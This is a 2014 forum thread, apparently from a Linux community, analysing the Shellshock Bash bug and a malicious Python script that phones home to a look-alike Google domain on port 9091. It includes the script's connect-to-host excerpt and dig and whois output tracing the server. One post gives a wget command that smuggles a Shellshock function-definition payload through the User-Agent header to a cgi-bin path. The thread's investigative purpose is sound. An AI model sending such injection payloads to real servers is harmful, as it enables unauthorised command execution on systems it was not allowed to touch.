Announcement

Collapse
No announcement yet.

A new BASH bug?

Collapse
This topic is closed.
X
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    #61
    IF I remember your CV correctly, Steve, you did have some programming classes under your belt.

    BTW, feathers, can you post the rest of the Python code in cl.py? (I'm too lazy to use wget to dl it from
    http://google-traffic-analytics.com/cl.py)
    "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people.”
    – John F. Kennedy, February 26, 1962.

    Comment


      #62
      Originally posted by GreyGeek View Post
      BTW, feathers, can you post the rest of the Python code in cl.py? (I'm too lazy to use wget to dl it from
      http://google-traffic-analytics.com/cl.py)
      That was the lot!
      samhobbs.co.uk

      Comment


        #63
        Originally posted by SteveRiley View Post
        It's quite difficult to insert something into the stream once the HTTPS session is established.

        If you were just spraying loads of domains, would something like this not work?

        Code:
        wget --secure-protocol=auto --no-check-certificate -U "() { test;};/usr/bin/checkmate" domain.com/cgi-bin/test
        Originally posted by SteveRiley View Post
        Too many choice!! Can you recommend a good one? Development seems to have stalled for some of the ones listed on the OWASP page.
        samhobbs.co.uk

        Comment


          #64
          Originally posted by Feathers McGraw View Post
          That was the lot!
          I had a Duh! moment (one of many these days) and just opened the code using a tab in FF. You did post the whole thing! I was expecting an encrypted IP but its just relying on an active connection, so if one ran netstat while it was connected and checked the 9091 port an IP address would be visible.
          "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people.”
          – John F. Kennedy, February 26, 1962.

          Comment


            #65
            Originally posted by GreyGeek View Post
            I was expecting an encrypted IP but its just relying on an active connection, so if one ran netstat while it was connected and checked the 9091 port an IP address would be visible.
            I don't even think you'd need to do that to find out the IP address, since the script gives a domain name...

            Code:
            if fpid!=0:
            
                [B]host='stats.google-traffic-analytics.com'[/B]
                port=9091
            ...
                def connect():
                    try:
                        sockobj=socket(AF_INET,SOCK_STREAM)
                        [B]sockobj.connect((host,port))[/B]
                        return sockobj
                    except:
                        return False
            Code:
            feathers-mcgraw@Hobbs-T440s:~$ dig stats.google-traffic-analytics.com 
            ; <<>> DiG 9.9.5-3-Ubuntu <<>> stats.google-traffic-analytics.com
            ;; global options: +cmd
            ;; Got answer:
            ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48675
            ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
            
            ;; OPT PSEUDOSECTION:
            ; EDNS: version: 0, flags:; udp: 4096
            ;; QUESTION SECTION:
            ;stats.google-traffic-analytics.com. IN A
            
            ;; ANSWER SECTION:
            stats.google-traffic-analytics.com. 3600 IN A   162.244.34.27
            
            ;; Query time: 166 msec
            ;; SERVER: 127.0.1.1#53(127.0.1.1)
            ;; WHEN: Sun Oct 05 16:36:32 BST 2014
            ;; MSG SIZE  rcvd: 79
            I am surprised that that domain name isn't already owned by Google, to be honest. It's quite a clever one to use because it looks kind of legit.
            samhobbs.co.uk

            Comment


              #66
              I was surprised too. I thought it was a google site that had been hacked. Whois on the domain name pulled up nothing, but on the IP address dig gave the results were:
              Code:
              [B]whois 162.244.34.27[/B]
              
              #
              # ARIN WHOIS data and services are subject to the Terms of Use
              # available at: https://www.arin.net/whois_tou.html
              #
              # If you see inaccuracies in the results, please report at
              # http://www.arin.net/public/whoisinaccuracy/index.xhtml
              #
              
              
              #
              # The following results may also be obtained via:
              # http://whois.arin.net/rest/nets;q=162.244.34.27?showDetails=true&showARIN=false&ext=netref2
              #
              
              
              # start
              
              NetRange:       162.244.32.0 - 162.244.35.255
              CIDR:           162.244.32.0/22
              OriginAS:       AS6939, AS30708, AS14576
              NetName:        KING-SERVERS
              NetHandle:      NET-162-244-32-0-1
              Parent:         NET-162-0-0-0-0
              NetType:        Direct Allocation
              Comment:        [B]http://king-servers.com/[/B]
              RegDate:        2014-03-05
              Updated:        2014-03-05
              Ref:            http://whois.arin.net/rest/net/NET-162-244-32-0-1
              
              OrgName:        Hosting Solution Ltd.
              OrgId:          HSL-50
              Address:        Office:
              Address:        Hosting Solution Ltd.
              Address:        201 Rogers Office Building
              Address:        Edwin Wallace Rey Drive
              Address:        George Hill,
              Address:        Anguilla
              Address:        
              Address:        Data Center:
              Address:        Hosting Solution Ltd.
              Address:        C/O Hurricane Electric
              Address:        48233 Warm Springs Blvd
              City:           Fremont
              StateProv:      CA
              PostalCode:     94539
              Country:        US
              RegDate:        2013-05-31
              Updated:        2014-10-02
              Comment:        http://king-servers.com/
              Ref:            http://whois.arin.net/rest/org/HSL-50
              
              OrgAbuseHandle: ABUSE4868-ARIN
              OrgAbuseName:   Abuse Department
              OrgAbusePhone:  +1-408-622-0063 
              OrgAbuseEmail: [B] abuse@king-servers.com[/B]
              OrgAbuseRef:    http://whois.arin.net/rest/poc/ABUSE4868-ARIN
              
              OrgNOCHandle: NOC32063-ARIN
              OrgNOCName:   Network Operations Center
              OrgNOCPhone:  +1-408-622-0063 
              OrgNOCEmail:  noc@king-servers.com
              OrgNOCRef:    http://whois.arin.net/rest/poc/NOC32063-ARIN
              
              OrgTechHandle: NOC32063-ARIN
              OrgTechName:   Network Operations Center
              OrgTechPhone:  +1-408-622-0063 
              OrgTechEmail:  noc@king-servers.com
              OrgTechRef:    http://whois.arin.net/rest/poc/NOC32063-ARIN
              
              # end
              
              
              # start
              
              NetRange:       162.244.34.0 - 162.244.34.255
              CIDR:           162.244.34.0/24
              OriginAS:       AS14576
              NetName:        KING-SERVERS-R003-R004
              NetHandle:      NET-162-244-34-0-1
              Parent:         NET-162-244-32-0-1
              NetType:        Reassigned
              RegDate:        2014-04-19
              Updated:        2014-04-19
              Ref:            http://whois.arin.net/rest/net/NET-162-244-34-0-1
              
              CustName:       Hosting Solution Ltd.
              Address:        48233 Warm Springs Blvd
              City:           Fremont
              StateProv:      CA
              PostalCode:     94539
              Country:        US
              RegDate:        2014-04-19
              Updated:        2014-04-19
              Ref:            http://whois.arin.net/rest/customer/C04995622
              
              OrgAbuseHandle: ABUSE4868-ARIN
              OrgAbuseName:   Abuse Department
              OrgAbusePhone:  +1-408-622-0063 
              OrgAbuseEmail:  abuse@king-servers.com
              OrgAbuseRef:    http://whois.arin.net/rest/poc/ABUSE4868-ARIN
              
              OrgNOCHandle: NOC32063-ARIN
              OrgNOCName:   Network Operations Center
              OrgNOCPhone:  +1-408-622-0063 
              OrgNOCEmail:  noc@king-servers.com
              OrgNOCRef:    http://whois.arin.net/rest/poc/NOC32063-ARIN
              
              OrgTechHandle: NOC32063-ARIN
              OrgTechName:   Network Operations Center
              OrgTechPhone:  +1-408-622-0063 
              OrgTechEmail:  noc@king-servers.com
              OrgTechRef:    http://whois.arin.net/rest/poc/NOC32063-ARIN
              
              # end
              That "google" site has a basic Apache2 web test page on it.
              "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people.”
              – John F. Kennedy, February 26, 1962.

              Comment


                #67
                Originally posted by Feathers McGraw View Post
                Too many choice!! Can you recommend a good one? Development seems to have stalled for some of the ones listed on the OWASP page.
                PeachFuzz community edition: http://sourceforge.net/projects/peachfuzz/
                Zed Attack Proxy: https://www.owasp.org/index.php/OWAS..._Proxy_Project

                FindBugs, static analysis for Java: http://findbugs.sourceforge.net/

                Comment


                  #68
                  Thanks for your recommendations! Now all I have to do is write something that needs testing

                  Originally posted by SteveRiley View Post
                  I can't seem to locate anything written by the Google researchers that describe how they discovered it.
                  An update on this: the Google researcher who discovered heartbleed was
                  doing laborious auditing of OpenSSL, going through the [Secure Sockets Layer] stack line by line
                  http://soylentnews.org/article.pl?sid=14/10/11/1516242
                  samhobbs.co.uk

                  Comment

                  Working...
                  X